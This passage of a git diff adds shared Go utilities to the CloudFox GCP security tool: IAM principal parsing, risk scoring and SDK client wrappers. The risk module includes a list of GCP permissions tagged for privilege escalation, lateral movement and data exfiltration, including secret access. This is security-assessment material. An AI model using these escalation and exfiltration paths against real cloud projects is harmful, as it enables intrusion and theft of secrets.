IsPrivateIP(ipOrURL) { + return EndpointTypePrivateIP + } + return EndpointTypeInternal +} diff --git a/gcp/shared/principals.go b/gcp/shared/principals.go new file mode 100644 index 00000000..7a7dff34 --- /dev/null +++ b/gcp/shared/principals.go @@ -0,0 +1,170 @@ +// Package shared provides common utilities for GCP CloudFox modules. +// This package contains helper functions for IAM principals, formatting, +// risk assessment, and other cross-cutting concerns. +package shared + +import "strings" + +// PrincipalType constants for IAM member types +const ( + PrincipalTypePublic = "PUBLIC" + PrincipalTypeAllAuthenticated = "ALL_AUTHENTICATED" + PrincipalTypeUser = "User" + PrincipalTypeServiceAccount = "ServiceAccount" + PrincipalTypeGroup = "Group" + PrincipalTypeDomain = "Domain" + PrincipalTypeProjectOwner = "ProjectOwner" + PrincipalTypeProjectEditor = "ProjectEditor" + PrincipalTypeProjectViewer = "ProjectViewer" + PrincipalTypeDeleted = "Deleted" + PrincipalTypeUnknown = "Unknown" +) + +// Lowercase principal type constants (for consistency with some existing code) +const ( + PrincipalTypeLowerUser = "user" + PrincipalTypeLowerServiceAccount = "serviceAccount" + PrincipalTypeLowerGroup = "group" + PrincipalTypeLowerUnknown = "unknown" +) + +// GetPrincipalType extracts the type of an IAM principal from its full member string. +// This handles the standard GCP IAM member format (e.g., "user:email@example.com"). +// Returns a capitalized type suitable for table display. +// +// Examples: +// - "allUsers" -> "PUBLIC" +// - "allAuthenticatedUsers" -> "ALL_AUTHENTICATED" +// - "user:admin@example.com" -> "User" +// - "serviceAccount:sa@project.iam.gserviceaccount.com" -> "ServiceAccount" +// - "group:devs@example.com" -> "Group" +// - "domain:example.com" -> "Domain" +func GetPrincipalType(member string) string { + switch { + case member == "allUsers": + return PrincipalTypePublic + case member == "allAuthenticatedUsers": + return PrincipalTypeAllAuthenticated + case strings.HasPrefix(member, "user:"): + return PrincipalTypeUser + case strings.HasPrefix(member, "serviceAccount:"): + return PrincipalTypeServiceAccount + case strings.HasPrefix(member, "group:"): + return PrincipalTypeGroup + case strings.HasPrefix(member, "domain:"): + return PrincipalTypeDomain + case strings.HasPrefix(member, "projectOwner:"): + return PrincipalTypeProjectOwner + case strings.HasPrefix(member, "projectEditor:"): + return PrincipalTypeProjectEditor + case strings.HasPrefix(member, "projectViewer:"): + return PrincipalTypeProjectViewer + case strings.HasPrefix(member, "deleted:"): + return PrincipalTypeDeleted + default: + return PrincipalTypeUnknown + } +} + +// GetPrincipalTypeLower returns the principal type in lowercase format. +// This is useful when consistent lowercase output is needed. +// +// Examples: +// - "user:admin@example.com" -> "user" +// - "serviceAccount:sa@project.iam.gserviceaccount.com" -> "serviceAccount" +// - "group:devs@example.com" -> "group" +func GetPrincipalTypeLower(principal string) string { + if strings.HasPrefix(principal, "user:") { + return PrincipalTypeLowerUser + } else if strings.HasPrefix(principal, "serviceAccount:") { + return PrincipalTypeLowerServiceAccount + } else if strings.HasPrefix(principal, "group:") { + return PrincipalTypeLowerGroup + } + return PrincipalTypeLowerUnknown +} + +// ExtractPrincipalEmail extracts the email/identifier from an IAM member string. +// Returns the part after the ":" prefix, or the original string if no prefix found. +// +// Examples: +// - "user:admin@example.com" -> "admin@example.com" +// - "serviceAccount:sa@project.iam.gserviceaccount.com" -> "sa@project.iam.gserviceaccount.com" +// - "allUsers" -> "allUsers" +func ExtractPrincipalEmail(member string) string { + if idx := strings.Index(member, ":"); idx != -1 { + return member[idx+1:] + } + return member +} + +// IsPublicPrincipal checks if a principal represents public access. +// Returns true for "allUsers" or "allAuthenticatedUsers". +func IsPublicPrincipal(member string) bool { + return member == "allUsers" || member == "allAuthenticatedUsers" +} + +// IsServiceAccount checks if a principal is a service account. +func IsServiceAccount(member string) bool { + return strings.HasPrefix(member, "serviceAccount:") +} + +// IsUser checks if a principal is a user. +func IsUser(member string) bool { + return strings.HasPrefix(member, "user:") +} + +// IsGroup checks if a principal is a group. +func IsGroup(member string) bool { + return strings.HasPrefix(member, "group:") +} + +// IsDeleted checks if a principal has been deleted. +func IsDeleted(member string) bool { + return strings.HasPrefix(member, "deleted:") +} + +// ExtractServiceAccountProject extracts the project ID from a service account email. +// Service account format: name@project-id.iam.gserviceaccount.com +// Returns empty string if not a valid service account format. +func ExtractServiceAccountProject(saEmail string) string { + // Handle prefixed format + email := ExtractPrincipalEmail(saEmail) + + // Check for .iam.gserviceaccount.com suffix + suffix := ".iam.gserviceaccount.com" + if !strings.HasSuffix(email, suffix) { + return "" + } + + // Extract project from name@project-id.iam.gserviceaccount.com + atIdx := strings.Index(email, "@") + if atIdx == -1 { + return "" + } + + projectPart := email[atIdx+1 : len(email)-len(suffix)] + return projectPart +} + +// IsDefaultServiceAccount checks if a service account is a default compute or app engine SA. +// Default SAs follow patterns like: +// - PROJECT_NUMBER-compute@developer.gserviceaccount.com +// - PROJECT_ID@appspot.gserviceaccount.com +func IsDefaultServiceAccount(saEmail string) bool { + email := ExtractPrincipalEmail(saEmail) + return strings.HasSuffix(email, "@developer.gserviceaccount.com") || + strings.HasSuffix(email, "@appspot.gserviceaccount.com") +} + +// IsGoogleManagedServiceAccount checks if a service account is managed by Google. +// These typically have formats like: +// - service-PROJECT_NUMBER@*.iam.gserviceaccount.com +// - PROJECT_NUMBER@cloudservices.gserviceaccount.com +func IsGoogleManagedServiceAccount(saEmail string) bool { + email := ExtractPrincipalEmail(saEmail) + return strings.HasPrefix(email, "service-") || + strings.Contains(email, "@cloudservices.gserviceaccount.com") || + strings.Contains(email, "@cloud-ml.google.com.iam.gserviceaccount.com") || + strings.Contains(email, "@gcp-sa-") +} diff --git a/gcp/shared/risk.go b/gcp/shared/risk.go new file mode 100644 index 00000000..1d6b8663 --- /dev/null +++ b/gcp/shared/risk.go @@ -0,0 +1,317 @@ +package shared + +import ( + "fmt" + "strings" +) + +// RiskLevel constants for standardized risk assessment across modules +const ( + RiskCritical = "CRITICAL" // Immediate exploitation possible, highest priority + RiskHigh = "HIGH" // Significant security issue, high priority + RiskMedium = "MEDIUM" // Notable risk, moderate priority + RiskLow = "LOW" // Minor issue or informational + RiskInfo = "INFO" // Informational, no direct risk + RiskNone = "NONE" // No risk identified +) + +// RiskScore represents a risk assessment with reasons +type RiskScore struct { + Level string // RiskCritical, RiskHigh, RiskMedium, RiskLow + Score int // Numeric score for comparison (0-100) + Reasons []string // Explanations for the risk level +} + +// NewRiskScore creates a new RiskScore with default low risk +func NewRiskScore() *RiskScore { + return &RiskScore{ + Level: RiskLow, + Score: 0, + Reasons: []string{}, + } +} + +// AddReason adds a reason and recalculates the risk level +func (r *RiskScore) AddReason(reason string, points int) { + r.Reasons = append(r.Reasons, reason) + r.Score += points + r.updateLevel() +} + +// SetCritical sets the risk to critical level with a reason +func (r *RiskScore) SetCritical(reason string) { + r.Level = RiskCritical + r.Score = 100 + r.Reasons = append(r.Reasons, reason) +} + +// updateLevel updates the risk level based on score +func (r *RiskScore) updateLevel() { + switch { + case r.Score >= 80: + r.Level = RiskCritical + case r.Score >= 50: + r.Level = RiskHigh + case r.Score >= 25: + r.Level = RiskMedium + default: + r.Level = RiskLow + } +} + +// ReasonsString returns all reasons as a single string +func (r *RiskScore) ReasonsString() string { + if len(r.Reasons) == 0 { + return "-" + } + return strings.Join(r.Reasons, "; ") +} + +// IsHighRisk returns true if risk level is HIGH or CRITICAL +func (r *RiskScore) IsHighRisk() bool { + return r.Level == RiskCritical || r.Level == RiskHigh +} + +// RiskLevelOrder returns the numeric order of a risk level (for sorting) +// Higher number = higher risk +func RiskLevelOrder(level string) int { + switch level { + case RiskCritical: + return 4 + case RiskHigh: + return 3 + case RiskMedium: + return 2 + case RiskLow: + return 1 + case RiskInfo, RiskNone: + return 0 + default: + return -1 + } +} + +// CompareRiskLevels compares two risk levels. +// Returns: -1 if a < b, 0 if a == b, 1 if a > b +func CompareRiskLevels(a, b string) int { + orderA := RiskLevelOrder(a) + orderB := RiskLevelOrder(b) + if orderA < orderB { + return -1 + } + if orderA > orderB { + return 1 + } + return 0 +} + +// MaxRiskLevel returns the higher of two risk levels +func MaxRiskLevel(a, b string) string { + if CompareRiskLevels(a, b) >= 0 { + return a + } + return b +} + +// RiskLevelFromScore converts a numeric score to a risk level +func RiskLevelFromScore(score int) string { + switch { + case score >= 80: + return RiskCritical + case score >= 50: + return RiskHigh + case score >= 25: + return RiskMedium + case score > 0: + return RiskLow + default: + return RiskNone + } +} + +// RiskCounts tracks counts of findings by risk level +type RiskCounts struct { + Critical int + High int + Medium int + Low int + Info int + Total int +} + +// Add increments the appropriate counter based on risk level +func (rc *RiskCounts) Add(level string) { + rc.Total++ + switch level { + case RiskCritical: + rc.Critical++ + case RiskHigh: + rc.High++ + case RiskMedium: + rc.Medium++ + case RiskLow: + rc.Low++ + case RiskInfo, RiskNone: + rc.Info++ + } +} + +// Summary returns a formatted summary string +func (rc *RiskCounts) Summary() string { + parts := []string{} + if rc.Critical > 0 { + parts = append(parts, fmt.Sprintf("%d CRITICAL", rc.Critical)) + } + if rc.High > 0 { + parts = append(parts, fmt.Sprintf("%d HIGH", rc.High)) + } + if rc.Medium > 0 { + parts = append(parts, fmt.Sprintf("%d MEDIUM", rc.Medium)) + } + if rc.Low > 0 { + parts = append(parts, fmt.Sprintf("%d LOW", rc.Low)) + } + if len(parts) == 0 { + return "No risks found" + } + return strings.Join(parts, ", ") +} + +// HasHighRisk returns true if there are any CRITICAL or HIGH findings +func (rc *RiskCounts) HasHighRisk() bool { + return rc.Critical > 0 || rc.High > 0 +} + +// Common risk assessment functions for GCP resources + +// AssessPublicAccessRisk returns risk level for public access configuration +func AssessPublicAccessRisk(isPublic bool, hasAllUsers bool, hasAllAuthenticatedUsers bool) string { + if hasAllUsers { + return RiskCritical // Publicly accessible to everyone + } + if hasAllAuthenticatedUsers { + return RiskHigh // Accessible to any Google account + } + if isPublic { + return RiskMedium // Some form of public access + } + return RiskNone +} + +// AssessEncryptionRisk returns risk level for encryption configuration +func AssessEncryptionRisk(encryptionEnabled bool, usesCMEK bool) string { + if !encryptionEnabled { + return RiskHigh // No encryption + } + if !usesCMEK { + return RiskLow // Google-managed keys (default) + } + return RiskNone // Customer-managed keys +} + +// AssessLoggingRisk returns risk level for logging configuration +func AssessLoggingRisk(loggingEnabled bool) string { + if !loggingEnabled { + return RiskMedium // No audit trail + } + return RiskNone +} + +// DangerousPermissionCategories defines categories of dangerous permissions +var DangerousPermissionCategories = map[string]string{ + // Privilege Escalation + "iam.serviceAccountKeys.create": "privesc", + "iam.serviceAccounts.actAs": "privesc", + "iam.serviceAccounts.getAccessToken": "privesc", + "iam.serviceAccounts.implicitDelegation": "privesc", + "iam.serviceAccounts.signBlob": "privesc", + "iam.serviceAccounts.signJwt": "privesc", + "deploymentmanager.deployments.create": "privesc", + "cloudfunctions.functions.create": "privesc", + "cloudfunctions.functions.update": "privesc", + "run.services.create": "privesc", + "composer.environments.create": "privesc", + "dataproc.clusters.create": "privesc", + "cloudbuild.builds.create": "privesc", + "resourcemanager.projects.setIamPolicy": "privesc", + "resourcemanager.folders.setIamPolicy": "privesc", + "resourcemanager.organizations.setIamPolicy": "privesc", + + // Lateral Movement + "compute.instances.setMetadata": "lateral", + "compute.projects.setCommonInstanceMetadata": "lateral", + "compute.instances.setServiceAccount": "lateral", + "container.clusters.getCredentials": "lateral", + + // Data Exfiltration + "storage.objects.get": "exfil", + "storage.objects.list": "exfil", + "bigquery.tables.getData": "exfil", + "bigquery.jobs.create": "exfil", + "secretmanager.versions.access": "exfil", + "cloudkms.cryptoKeyVersions.useToDecrypt": "exfil", +} + +// IsDangerousPermission checks if a permission is considered dangerous +func IsDangerousPermission(permission string) bool { + _, exists := DangerousPermissionCategories[permission] + return exists +} + +// GetPermissionCategory returns the risk category for a permission +func GetPermissionCategory(permission string) string { + if cat, exists := DangerousPermissionCategories[permission]; exists { + return cat + } + return "" +} + +// AssessPermissionRisk returns the risk level for a specific permission +func AssessPermissionRisk(permission string) string { + category := GetPermissionCategory(permission) + switch category { + case "privesc": + return RiskCritical + case "lateral": + return RiskHigh + case "exfil": + return RiskHigh + default: + return RiskLow + } +} + +// HighPrivilegeRoles lists roles that grant significant permissions +var HighPrivilegeRoles = map[string]string{ + "roles/owner": RiskCritical, + "roles/editor": RiskCritical, + "roles/iam.securityAdmin": RiskCritical, + "roles/iam.serviceAccountAdmin": RiskCritical, + "roles/iam.serviceAccountKeyAdmin": RiskCritical, + "roles/iam.serviceAccountTokenCreator": RiskCritical, + "roles/iam.serviceAccountUser": RiskHigh, + "roles/iam.workloadIdentityUser": RiskHigh, + "roles/storage.admin": RiskHigh, + "roles/bigquery.admin": RiskHigh, + "roles/secretmanager.admin": RiskHigh, + "roles/cloudkms.admin": RiskHigh, + "roles/compute.admin": RiskHigh, + "roles/container.admin": RiskHigh, + "roles/cloudfunctions.admin": RiskHigh, + "roles/run.admin": RiskHigh, + "roles/cloudsql.admin": RiskHigh, + "roles/dataproc.admin": RiskHigh, + "roles/composer.admin": RiskHigh, +} + +// AssessRoleRisk returns the risk level for a given role +func AssessRoleRisk(role string) string { + if level, exists := HighPrivilegeRoles[role]; exists { + return level + } + // Check for admin patterns + if strings.HasSuffix(role, ".admin") || strings.Contains(role, "Admin") { + return RiskMedium + } + return RiskLow +} diff --git a/gcp/sdk/cache.go b/internal/gcp/sdk/cache.go similarity index 100% rename from gcp/sdk/cache.go rename to internal/gcp/sdk/cache.go diff --git a/internal/gcp/sdk/clients.go b/internal/gcp/sdk/clients.go new file mode 100644 index 00000000..1a6c6780 --- /dev/null +++ b/internal/gcp/sdk/clients.go @@ -0,0 +1,1051 @@ +package sdk + +import ( + "context" + "fmt" + + // Go SDK clients (NewClient pattern) + "cloud.google.com/go/artifactregistry/apiv1" + "cloud.google.com/go/asset/apiv1" + "cloud.google.com/go/bigquery" + "cloud.google.com/go/pubsub" + "cloud.google.com/go/resourcemanager/apiv3" + secretmanagerclient "cloud.google.com/go/secretmanager/apiv1" + "cloud.google.com/go/storage" + + // REST API services (NewService pattern) + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + accesscontextmanager "google.golang.org/api/accesscontextmanager/v1" + apikeys "google.golang.org/api/apikeys/v2" + artifactregistryapi "google.golang.org/api/artifactregistry/v1" + beyondcorp "google.golang.org/api/beyondcorp/v1" + bigqueryapi "google.golang.org/api/bigquery/v2" + bigtableadmin "google.golang.org/api/bigtableadmin/v2" + certificatemanager "google.golang.org/api/certificatemanager/v1" + cloudbuild "google.golang.org/api/cloudbuild/v1" + cloudfunctions "google.golang.org/api/cloudfunctions/v1" + cloudfunctionsv2 "google.golang.org/api/cloudfunctions/v2" + cloudidentity "google.golang.org/api/cloudidentity/v1" + cloudkms "google.golang.org/api/cloudkms/v1" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + cloudscheduler "google.golang.org/api/cloudscheduler/v1" + composer "google.golang.org/api/composer/v1" + compute "google.golang.org/api/compute/v1" + container "google.golang.org/api/container/v1" + dataflow "google.golang.org/api/dataflow/v1b3" + dataproc "google.golang.org/api/dataproc/v1" + dns "google.golang.org/api/dns/v1" + file "google.golang.org/api/file/v1" + iam "google.golang.org/api/iam/v1" + iap "google.golang.org/api/iap/v1" + logging "google.golang.org/api/logging/v2" + notebooks "google.golang.org/api/notebooks/v1" + orgpolicy "google.golang.org/api/orgpolicy/v2" + pubsubapi "google.golang.org/api/pubsub/v1" + redis "google.golang.org/api/redis/v1" + run "google.golang.org/api/run/v1" + runv2 "google.golang.org/api/run/v2" + secretmanagerapi "google.golang.org/api/secretmanager/v1" + servicenetworking "google.golang.org/api/servicenetworking/v1" + sourcerepo "google.golang.org/api/sourcerepo/v1" + spanner "google.golang.org/api/spanner/v1" + sqladmin "google.golang.org/api/sqladmin/v1" + sqladminbeta "google.golang.org/api/sqladmin/v1beta4" + storageapi "google.golang.org/api/storage/v1" +) + +// ============================================================================= +// GO SDK CLIENTS (NewClient pattern) - These return *Client types +// ============================================================================= + +// GetStorageClient returns a Cloud Storage client (Go SDK) +func GetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + client, err := storage.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create storage client: %w", err) + } + return client, nil +} + +// GetSecretManagerClient returns a Secret Manager client (Go SDK) +func GetSecretManagerClient(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerclient.Client, error) { + client, err := secretmanagerclient.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create secret manager client: %w", err) + } + return client, nil +} + +// GetBigQueryClient returns a BigQuery client (Go SDK) +func GetBigQueryClient(ctx context.Context, session *gcpinternal.SafeSession, projectID string) (*bigquery.Client, error) { + client, err := bigquery.NewClient(ctx, projectID, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BigQuery client: %w", err) + } + return client, nil +} + +// GetPubSubClient returns a Pub/Sub client (Go SDK) +func GetPubSubClient(ctx context.Context, session *gcpinternal.SafeSession, projectID string) (*pubsub.Client, error) { + client, err := pubsub.NewClient(ctx, projectID, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Pub/Sub client: %w", err) + } + return client, nil +} + +// GetAssetClient returns a Cloud Asset client (Go SDK) +func GetAssetClient(ctx context.Context, session *gcpinternal.SafeSession) (*asset.Client, error) { + client, err := asset.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create asset client: %w", err) + } + return client, nil +} + +// GetArtifactRegistryClient returns an Artifact Registry client (Go SDK) +func GetArtifactRegistryClient(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistry.Client, error) { + client, err := artifactregistry.NewClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create artifact registry client: %w", err) + } + return client, nil +} + +// GetOrganizationsClient returns a Resource Manager Organizations client (Go SDK) +func GetOrganizationsClient(ctx context.Context, session *gcpinternal.SafeSession) (*resourcemanager.OrganizationsClient, error) { + client, err := resourcemanager.NewOrganizationsClient(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create organizations client: %w", err) + } + return client, nil +} + +// ============================================================================= +// REST API SERVICES (NewService pattern) - These return *Service types +// ============================================================================= + +// GetComputeService returns a Compute Engine service +func GetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + service, err := compute.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create compute service: %w", err) + } + return service, nil +} + +// GetIAMService returns an IAM Admin service +func GetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + service, err := iam.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %w", err) + } + return service, nil +} + +// GetResourceManagerService returns a Cloud Resource Manager service (v1) +func GetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + service, err := cloudresourcemanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create resource manager service: %w", err) + } + return service, nil +} + +// GetSecretManagerService returns a Secret Manager service (REST API) +func GetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerapi.Service, error) { + service, err := secretmanagerapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create secret manager service: %w", err) + } + return service, nil +} + +// GetBigQueryService returns a BigQuery service (REST API v2) +func GetBigQueryService(ctx context.Context, session *gcpinternal.SafeSession) (*bigqueryapi.Service, error) { + service, err := bigqueryapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BigQuery service: %w", err) + } + return service, nil +} + +// GetStorageService returns a Cloud Storage service (REST API) +func GetStorageService(ctx context.Context, session *gcpinternal.SafeSession) (*storageapi.Service, error) { + service, err := storageapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create storage service: %w", err) + } + return service, nil +} + +// GetArtifactRegistryService returns an Artifact Registry service (REST API) +func GetArtifactRegistryService(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistryapi.Service, error) { + service, err := artifactregistryapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Artifact Registry service: %w", err) + } + return service, nil +} + +// GetContainerService returns a GKE Container service +func GetContainerService(ctx context.Context, session *gcpinternal.SafeSession) (*container.Service, error) { + service, err := container.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create container service: %w", err) + } + return service, nil +} + +// GetCloudRunService returns a Cloud Run service (v1) +func GetCloudRunService(ctx context.Context, session *gcpinternal.SafeSession) (*run.APIService, error) { + service, err := run.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run service: %w", err) + } + return service, nil +} + +// GetCloudRunServiceV2 returns a Cloud Run service (v2) +func GetCloudRunServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*runv2.Service, error) { + service, err := runv2.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Run v2 service: %w", err) + } + return service, nil +} + +// GetCloudFunctionsService returns a Cloud Functions service (v1) +func GetCloudFunctionsService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctions.Service, error) { + service, err := cloudfunctions.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Functions service: %w", err) + } + return service, nil +} + +// GetCloudFunctionsServiceV2 returns a Cloud Functions v2 service +func GetCloudFunctionsServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctionsv2.Service, error) { + service, err := cloudfunctionsv2.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Functions v2 service: %w", err) + } + return service, nil +} + +// GetCloudIdentityService returns a Cloud Identity service +func GetCloudIdentityService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudidentity.Service, error) { + service, err := cloudidentity.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Identity service: %w", err) + } + return service, nil +} + +// GetAccessContextManagerService returns an Access Context Manager service +func GetAccessContextManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*accesscontextmanager.Service, error) { + service, err := accesscontextmanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Access Context Manager service: %w", err) + } + return service, nil +} + +// GetRedisService returns a Memorystore Redis service +func GetRedisService(ctx context.Context, session *gcpinternal.SafeSession) (*redis.Service, error) { + service, err := redis.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Redis service: %w", err) + } + return service, nil +} + +// GetServiceNetworkingService returns a Service Networking service +func GetServiceNetworkingService(ctx context.Context, session *gcpinternal.SafeSession) (*servicenetworking.APIService, error) { + service, err := servicenetworking.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Service Networking service: %w", err) + } + return service, nil +} + +// GetComposerService returns a Cloud Composer service +func GetComposerService(ctx context.Context, session *gcpinternal.SafeSession) (*composer.Service, error) { + service, err := composer.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Composer service: %w", err) + } + return service, nil +} + +// GetDataflowService returns a Dataflow service +func GetDataflowService(ctx context.Context, session *gcpinternal.SafeSession) (*dataflow.Service, error) { + service, err := dataflow.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Dataflow service: %w", err) + } + return service, nil +} + +// GetDataprocService returns a Dataproc service +func GetDataprocService(ctx context.Context, session *gcpinternal.SafeSession) (*dataproc.Service, error) { + service, err := dataproc.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Dataproc service: %w", err) + } + return service, nil +} + +// GetNotebooksService returns a Notebooks service +func GetNotebooksService(ctx context.Context, session *gcpinternal.SafeSession) (*notebooks.Service, error) { + service, err := notebooks.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Notebooks service: %w", err) + } + return service, nil +} + +// GetBeyondCorpService returns a BeyondCorp service +func GetBeyondCorpService(ctx context.Context, session *gcpinternal.SafeSession) (*beyondcorp.Service, error) { + service, err := beyondcorp.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create BeyondCorp service: %w", err) + } + return service, nil +} + +// GetIAPService returns an IAP service +func GetIAPService(ctx context.Context, session *gcpinternal.SafeSession) (*iap.Service, error) { + service, err := iap.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create IAP service: %w", err) + } + return service, nil +} + +// GetKMSService returns a Cloud KMS service +func GetKMSService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudkms.Service, error) { + service, err := cloudkms.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create KMS service: %w", err) + } + return service, nil +} + +// GetSQLAdminService returns a Cloud SQL Admin service (v1) +func GetSQLAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*sqladmin.Service, error) { + service, err := sqladmin.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create SQL Admin service: %w", err) + } + return service, nil +} + +// GetSQLAdminServiceBeta returns a Cloud SQL Admin service (v1beta4) +func GetSQLAdminServiceBeta(ctx context.Context, session *gcpinternal.SafeSession) (*sqladminbeta.Service, error) { + service, err := sqladminbeta.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create SQL Admin beta service: %w", err) + } + return service, nil +} + +// GetDNSService returns a Cloud DNS service +func GetDNSService(ctx context.Context, session *gcpinternal.SafeSession) (*dns.Service, error) { + service, err := dns.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create DNS service: %w", err) + } + return service, nil +} + +// GetPubSubService returns a Pub/Sub service (REST API) +func GetPubSubService(ctx context.Context, session *gcpinternal.SafeSession) (*pubsubapi.Service, error) { + service, err := pubsubapi.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Pub/Sub service: %w", err) + } + return service, nil +} + +// GetLoggingService returns a Cloud Logging service +func GetLoggingService(ctx context.Context, session *gcpinternal.SafeSession) (*logging.Service, error) { + service, err := logging.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Logging service: %w", err) + } + return service, nil +} + +// GetSpannerService returns a Cloud Spanner service +func GetSpannerService(ctx context.Context, session *gcpinternal.SafeSession) (*spanner.Service, error) { + service, err := spanner.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Spanner service: %w", err) + } + return service, nil +} + +// GetBigtableAdminService returns a Bigtable Admin service +func GetBigtableAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*bigtableadmin.Service, error) { + service, err := bigtableadmin.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Bigtable Admin service: %w", err) + } + return service, nil +} + +// GetFilestoreService returns a Filestore service +func GetFilestoreService(ctx context.Context, session *gcpinternal.SafeSession) (*file.Service, error) { + service, err := file.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Filestore service: %w", err) + } + return service, nil +} + +// GetSourceRepoService returns a Source Repositories service +func GetSourceRepoService(ctx context.Context, session *gcpinternal.SafeSession) (*sourcerepo.Service, error) { + service, err := sourcerepo.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Source Repositories service: %w", err) + } + return service, nil +} + +// GetCloudBuildService returns a Cloud Build service +func GetCloudBuildService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudbuild.Service, error) { + service, err := cloudbuild.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Build service: %w", err) + } + return service, nil +} + +// GetOrgPolicyService returns an Organization Policy service +func GetOrgPolicyService(ctx context.Context, session *gcpinternal.SafeSession) (*orgpolicy.Service, error) { + service, err := orgpolicy.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Org Policy service: %w", err) + } + return service, nil +} + +// GetSchedulerService returns a Cloud Scheduler service +func GetSchedulerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudscheduler.Service, error) { + service, err := cloudscheduler.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Scheduler service: %w", err) + } + return service, nil +} + +// GetAPIKeysService returns an API Keys service +func GetAPIKeysService(ctx context.Context, session *gcpinternal.SafeSession) (*apikeys.Service, error) { + service, err := apikeys.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create API Keys service: %w", err) + } + return service, nil +} + +// GetCertificateManagerService returns a Certificate Manager service +func GetCertificateManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*certificatemanager.Service, error) { + service, err := certificatemanager.NewService(ctx, session.GetClientOption()) + if err != nil { + return nil, fmt.Errorf("failed to create Certificate Manager service: %w", err) + } + return service, nil +} + +// ============================================================================= +// CACHED CLIENT WRAPPERS - These cache clients for reuse +// ============================================================================= + +// CachedGetStorageClient returns a cached Storage client +func CachedGetStorageClient(ctx context.Context, session *gcpinternal.SafeSession) (*storage.Client, error) { + cacheKey := CacheKey("client", "storage") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*storage.Client), nil + } + client, err := GetStorageClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetComputeService returns a cached Compute Engine service +func CachedGetComputeService(ctx context.Context, session *gcpinternal.SafeSession) (*compute.Service, error) { + cacheKey := CacheKey("client", 